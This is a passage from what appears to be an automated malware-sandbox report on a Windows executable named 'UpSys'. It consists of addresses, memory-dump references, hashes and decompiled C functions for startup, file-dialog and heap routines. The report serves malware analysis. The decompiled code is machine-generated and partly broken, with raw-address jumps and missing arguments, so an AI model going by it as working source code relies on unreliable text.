                                                                                                                                                              0x1400053a7
                                                                                                                                                              0x1400053b4
                                                                                                                                                              0x1400053ba
                                                                                                                                                              0x1400053cb
                                                                                                                                                              0x1400053d1
                                                                                                                                                              0x1400053d5
                                                                                                                                                              0x1400053e8
                                                                                                                                                              0x1400053ec
                                                                                                                                                              0x1400053f4
                                                                                                                                                              0x1400053fb
                                                                                                                                                              0x140005408
                                                                                                                                                              0x14000540f
                                                                                                                                                              0x140005415
                                                                                                                                                              0x140005419
                                                                                                                                                              0x14000541e
                                                                                                                                                              0x140005429
                                                                                                                                                              0x140005436
                                                                                                                                                              0x14000543c
                                                                                                                                                              0x140005442
                                                                                                                                                              0x14000544b
                                                                                                                                                              0x140005454
                                                                                                                                                              0x14000545d
                                                                                                                                                              0x140005466
                                                                                                                                                              0x14000546c
                                                                                                                                                              0x140005473
                                                                                                                                                              0x14000547a
                                                                                                                                                              0x140005484
                                                                                                                                                              0x14000548d
                                                                                                                                                              0x140005495
                                                                                                                                                              0x14000549b
                                                                                                                                                              0x1400054a3
                                                                                                                                                              0x1400054aa
                                                                                                                                                              0x1400054b2
                                                                                                                                                              0x1400054b6
                                                                                                                                                              0x1400054ba
                                                                                                                                                              0x1400054be
                                                                                                                                                              0x1400054c0
                                                                                                                                                              0x1400054d0
                                                                                                                                                              0x1400054da
                                                                                                                                                              0x1400054de
                                                                                                                                                              0x1400054e6
                                                                                                                                                              0x1400054ec
                                                                                                                                                              0x1400054f5
                                                                                                                                                              0x1400054fe
                                                                                                                                                              0x140005503
                                                                                                                                                              0x140005508
                                                                                                                                                              0x14000550f
                                                                                                                                                              0x140005518
                                                                                                                                                              0x140005521
                                                                                                                                                              0x14000552a
                                                                                                                                                              0x140005533
                                                                                                                                                              0x14000554d
                                                                                                                                                              0x140005553
                                                                                                                                                              0x140005564

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Current_exceptionstd::exception_ptr::_$ClearVariant
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 332225251-0
                                                                                                                                                              • Opcode ID: f8dddbefb9a87b1b74436d3fbb438b43fb4297f6a55c81c8dd75d9c773274447
                                                                                                                                                              • Instruction ID: 7b18ed32aba9f3cb9316b0a356e55419a041fc7e00025d3b9419a89c00a96109
                                                                                                                                                              • Opcode Fuzzy Hash: f8dddbefb9a87b1b74436d3fbb438b43fb4297f6a55c81c8dd75d9c773274447
                                                                                                                                                              • Instruction Fuzzy Hash: 6AA16F72205A4082EB16EF26E4903EE6365F78EBC9F684511FB4E477B6CB79C991C700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014001D2A8 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E0000000114001D2A8(void* __edx, long long __rbx, void* __rdx, void* __r8, signed int _a8, long long _a16) {
				signed short _v56;
				void* _v60;
				char _v120;
				intOrPtr _v136;
				void* __rdi;
				void* _t25;
				void* _t28;
				void* _t36;
				void* _t37;
				intOrPtr _t39;
				void* _t68;
				void* _t71;
				long long _t89;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t106;

				_t102 = __r8;
				_t94 = __rdx;
				_t90 = __rbx;
				_a16 = __rbx;
				GetStartupInfoW(??);
				if ( *0x140000000 != 0x5a4d) goto 0x4001d331;
				_t89 =  *0x14000003C + 0x140000000;
				if ( *_t89 == 0x4550) goto 0x4001d2f3;
				_a8 = 0;
				goto 0x4001d341;
				if ( *((intOrPtr*)(_t89 + 0x18)) == 0x20b) goto 0x4001d309;
				_a8 = 0;
				goto 0x4001d341;
				if ( *((intOrPtr*)(_t89 + 0x84)) - 0xe > 0) goto 0x4001d31d;
				_a8 = 0;
				goto 0x4001d341;
				_a8 = 0 |  *((intOrPtr*)(_t89 + 0xf8)) != 0x00000000;
				goto 0x4001d341;
				_a8 = 0;
				_t25 = E00000001140020CA8(1, _t89); // executed
				if (_t25 != 0) goto 0x4001d371;
				if ( *0x400b4558 != 1) goto 0x4001d35d;
				E0000000114001EF68();
				E0000000114001ED40(0x1c, __rbx, 0x140000000, _t104, _t106);
				E00000001140016FE0(); // executed
				_t28 = E0000000114001D88C(_t89,  &_v120); // executed
				if (_t28 != 0) goto 0x4001d39c;
				if ( *0x400b4558 != 1) goto 0x4001d388;
				E0000000114001EF68();
				E0000000114001ED40(0x10, _t90, 0x140000000, _t104, _t106);
				E00000001140016FE0();
				E0000000114001F200(_t90);
				if (E00000001140021C60(0xff, _t90, _t94, 0x140000000, _t97, _t98, _t105) >= 0) goto 0x4001d3b5;
				E00000001140016F74();
				GetCommandLineW();
				 *0x400c8ac8 = _t89; // executed
				E000000011400294D8(_t68, _t71, _t89, _t90, _t97, _t98); // executed
				 *0x400b4550 = _t89;
				if (E000000011400293E8(_t90, _t102, _t106) >= 0) goto 0x4001d3e0;
				E00000001140016F74(); // executed
				_t36 = E00000001140029118(_t35, 8, _t90, _t94, 0x140000000, _t97, _t98, _t104); // executed
				if (_t36 >= 0) goto 0x4001d3f3;
				E00000001140016F74();
				_t37 = E00000001140017080(1, _t89, _t90, _t102); // executed
				if (_t37 == 0) goto 0x4001d408;
				E00000001140016F74();
				E000000011400290BC(_t102);
				r9d = 0xa;
				r9d =  !=  ? _v56 & 0x0000ffff : r9d;
				_t103 = _t89;
				_t39 = E000000011400120D0(_t90, 0x140000000, 0x140000000, _t89); // executed
				_v136 = _t39;
				if (0 != 0) goto 0x4001d43f;
				E000000011400172BC(_t89, _t94, _t89); // executed
				E000000011400172D4(_t89, _t94);
				if (_a8 != 0) goto 0x4001d45a;
				E000000011400172C8(_t89, _t94, _t103);
				asm("int3");
				E000000011400172E4(_t89);
				return 0xff;
			}























                                                                                                                                                              0x14001d2a8
                                                                                                                                                              0x14001d2a8
                                                                                                                                                              0x14001d2a8
                                                                                                                                                              0x14001d2a8
                                                                                                                                                              0x14001d2ba
                                                                                                                                                              0x14001d2cd
                                                                                                                                                              0x14001d2dd
                                                                                                                                                              0x14001d2e6
                                                                                                                                                              0x14001d2ea
                                                                                                                                                              0x14001d2f1
                                                                                                                                                              0x14001d2fc
                                                                                                                                                              0x14001d300
                                                                                                                                                              0x14001d307
                                                                                                                                                              0x14001d310
                                                                                                                                                              0x14001d314
                                                                                                                                                              0x14001d31b
                                                                                                                                                              0x14001d328
                                                                                                                                                              0x14001d32f
                                                                                                                                                              0x14001d333
                                                                                                                                                              0x14001d346
                                                                                                                                                              0x14001d34d
                                                                                                                                                              0x14001d356
                                                                                                                                                              0x14001d358
                                                                                                                                                              0x14001d362
                                                                                                                                                              0x14001d36c
                                                                                                                                                              0x14001d371
                                                                                                                                                              0x14001d378
                                                                                                                                                              0x14001d381
                                                                                                                                                              0x14001d383
                                                                                                                                                              0x14001d38d
                                                                                                                                                              0x14001d397
                                                                                                                                                              0x14001d39c
                                                                                                                                                              0x14001d3a9
                                                                                                                                                              0x14001d3b0
                                                                                                                                                              0x14001d3b5
                                                                                                                                                              0x14001d3ba
                                                                                                                                                              0x14001d3c1
                                                                                                                                                              0x14001d3c6
                                                                                                                                                              0x14001d3d4
                                                                                                                                                              0x14001d3db
                                                                                                                                                              0x14001d3e0
                                                                                                                                                              0x14001d3e7
                                                                                                                                                              0x14001d3ee
                                                                                                                                                              0x14001d3f8
                                                                                                                                                              0x14001d3ff
                                                                                                                                                              0x14001d403
                                                                                                                                                              0x14001d408
                                                                                                                                                              0x14001d417
                                                                                                                                                              0x14001d41d
                                                                                                                                                              0x14001d421
                                                                                                                                                              0x14001d429
                                                                                                                                                              0x14001d430
                                                                                                                                                              0x14001d436
                                                                                                                                                              0x14001d43a
                                                                                                                                                              0x14001d43f
                                                                                                                                                              0x14001d450
                                                                                                                                                              0x14001d454
                                                                                                                                                              0x14001d459
                                                                                                                                                              0x14001d45a
                                                                                                                                                              0x14001d479

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CommandInfoLineStartup_cinit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1675588807-0
                                                                                                                                                              • Opcode ID: 6ab1c1a48c1a2fa7137cc6699521b54463bedc202b4b62e12f967bb70885e06a
                                                                                                                                                              • Instruction ID: 59e0c463972dea6f68e19551f4f921b183fddfcbd7e75fe3d38ffbb171ce5a12
                                                                                                                                                              • Opcode Fuzzy Hash: 6ab1c1a48c1a2fa7137cc6699521b54463bedc202b4b62e12f967bb70885e06a
                                                                                                                                                              • Instruction Fuzzy Hash: 93418F3160478186FB63ABA7A4513EE72A1AB8D3C4F00013EB7558B6F7DF7AC9458712
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400402B0 Relevance: 7.5, APIs: 5, Instructions: 31serviceCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$Database$CloseErrorHandleLastLockManagerOpenUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2828566434-0
                                                                                                                                                              • Opcode ID: 9688c46ef07dd9e9bd88244391e25d28354308e51eb9d057f886d7b4546c7fc2
                                                                                                                                                              • Instruction ID: 5f00c94e132aa66d53b9774042b0d0b0e6cfbea5833454ec1be0a1273f02195c
                                                                                                                                                              • Opcode Fuzzy Hash: 9688c46ef07dd9e9bd88244391e25d28354308e51eb9d057f886d7b4546c7fc2
                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0BE33601680C6EB169F63E5887E82350B789BC1F484435FF1B033B4DE3C88888618
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140015150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                              			E00000001140015150(long long __rbx, void* __rcx, short* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				void* _v8;
				void* _t11;
				void* _t13;
				short* _t15;
				void* _t27;
				void* _t29;
				void* _t31;

				_a8 = __rbx;
				_a16 = __rsi;
				_t29 = __r8;
				_t15 = __rdx;
				 *((char*)(__rcx + 3)) =  *0x400b5498 & 0x000000ff;
				_t27 = __rcx;
				if ( *__rdx == 0) goto 0x40035a90;
				E00000001140015480(E000000011400151D0(_t13, __rdx, __rdx), __rdx, __rdx, __rdx, _t29); // executed
				r8d = E00000001140015270(_t15, _t27, _t15);
				_t11 = E000000011400142D0(_t15, _t27, _t15, _t31, _t29); // executed
				return _t11;
			}










                                                                                                                                                              0x140015150
                                                                                                                                                              0x140015155
                                                                                                                                                              0x140015169
                                                                                                                                                              0x14001516c
                                                                                                                                                              0x14001516f
                                                                                                                                                              0x140015176
                                                                                                                                                              0x140015179
                                                                                                                                                              0x140015190
                                                                                                                                                              0x1400151a6
                                                                                                                                                              0x1400151ac
                                                                                                                                                              0x1400151c5

                                                                                                                                                              APIs
                                                                                                                                                              • GetOpenFileNameW.COMDLG32 ref: 0000000140035B0A
                                                                                                                                                                • Part of subcall function 00000001400151D0: GetFullPathNameW.KERNEL32 ref: 00000001400151F5
                                                                                                                                                                • Part of subcall function 0000000140015480: SHGetMalloc.SHELL32 ref: 0000000140015498
                                                                                                                                                                • Part of subcall function 0000000140015480: SHGetDesktopFolder.SHELL32 ref: 00000001400154B5
                                                                                                                                                                • Part of subcall function 0000000140015480: SHGetPathFromIDListW.SHELL32 ref: 0000000140015518
                                                                                                                                                                • Part of subcall function 0000000140015270: GetFullPathNameW.KERNEL32 ref: 0000000140015298
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
                                                                                                                                                              • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                              • API String ID: 819131735-2360590182
                                                                                                                                                              • Opcode ID: 105d4e9beebce084b3c481a92fcac844483b794bfa2bd19de7aab8e4da912ac8
                                                                                                                                                              • Instruction ID: 107247b71c47e2ea2a5ef26145e1bf696132746a0020a3db67fe949b5071bb7c
                                                                                                                                                              • Opcode Fuzzy Hash: 105d4e9beebce084b3c481a92fcac844483b794bfa2bd19de7aab8e4da912ac8
                                                                                                                                                              • Instruction Fuzzy Hash: 8C213D71204B8085E7229F12E8443DAB7A4F78DBC4F948125EB8C4BBA9DB7DC1458B40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140005240 Relevance: 4.6, APIs: 3, Instructions: 109COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b197ac18185f4eff8710537e5cf7a7ba9b97161ce22e4e2ebe5d17221256f12e
                                                                                                                                                              • Instruction ID: 53a1f15f0a241f42099e113182f4b35ddd2de3fa640b306f3da4d2ddd580cf36
                                                                                                                                                              • Opcode Fuzzy Hash: b197ac18185f4eff8710537e5cf7a7ba9b97161ce22e4e2ebe5d17221256f12e
                                                                                                                                                              • Instruction Fuzzy Hash: E5413D72205A0486EA66EF63E5543EE2371FB8EFC1F584011FB4A4B6B6CF39C9918741
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140017364 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Pointer$DecodeEncode_lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3858338685-0
                                                                                                                                                              • Opcode ID: fda6332b8a86095a8437879412e21d87a4eca25b9bfed1270015353d64998b20
                                                                                                                                                              • Instruction ID: a16ad8b19e0f05c344dd300be9081555338010b878e07884f33d5e28d1a2a8a0
                                                                                                                                                              • Opcode Fuzzy Hash: fda6332b8a86095a8437879412e21d87a4eca25b9bfed1270015353d64998b20
                                                                                                                                                              • Instruction Fuzzy Hash: D9E04631600E8082EF0AAB93F9813E872619B8CBC0F444029BB1A4F3A3CC39C4908708
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014003F260 Relevance: 3.8, APIs: 3, Instructions: 26COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _errnomalloc$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2612591707-0
                                                                                                                                                              • Opcode ID: eeaefc060679e1663e5ac6a4fd6b8e9bacd41bb694b288fe4e618cc951a4cc13
                                                                                                                                                              • Instruction ID: 7b9d3fe07f0e16f7c0c3c5b7f09c605ccb725fe5035f43ee17b4b634b8ffc70c
                                                                                                                                                              • Opcode Fuzzy Hash: eeaefc060679e1663e5ac6a4fd6b8e9bacd41bb694b288fe4e618cc951a4cc13
                                                                                                                                                              • Instruction Fuzzy Hash: 55F0F8B6651A4182EB579A72A4153FB2390D74D789F080538BB494F3E6EF3548909364
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014003F210 Relevance: 3.8, APIs: 3, Instructions: 18COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$ErrorLastPrivilegeRelease_errno
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1805546551-0
                                                                                                                                                              • Opcode ID: 2c9e134b6905873d57133a7f009df310aa304c93b8e56ccb09eb4d229938c89f
                                                                                                                                                              • Instruction ID: 058602f004a5c2d32edda4a50e8c555ae01d6b10fba8c9771ebbec03be93decf
                                                                                                                                                              • Opcode Fuzzy Hash: 2c9e134b6905873d57133a7f009df310aa304c93b8e56ccb09eb4d229938c89f
                                                                                                                                                              • Instruction Fuzzy Hash: 58E0ECBE74344080FE9BAAA390517FA03A0AF8DB94F0C0865BF0D4F6A2CE3588415324
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140014360 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                              • Opcode ID: 5f378f7cc4e63232f147dc72e2cad58f344c3f34cb53c46d016ea225a514af0d
                                                                                                                                                              • Instruction ID: 964ee58c513e3ea131f23a5c54b4efef566778de2546ab40d17f2b25ba2c6de4
                                                                                                                                                              • Opcode Fuzzy Hash: 5f378f7cc4e63232f147dc72e2cad58f344c3f34cb53c46d016ea225a514af0d
                                                                                                                                                              • Instruction Fuzzy Hash: A2313B722181C585E723CB26E4407DE3760F38D7C4F944112F78E8B9BADA7AC689CB01
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140015FF0 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
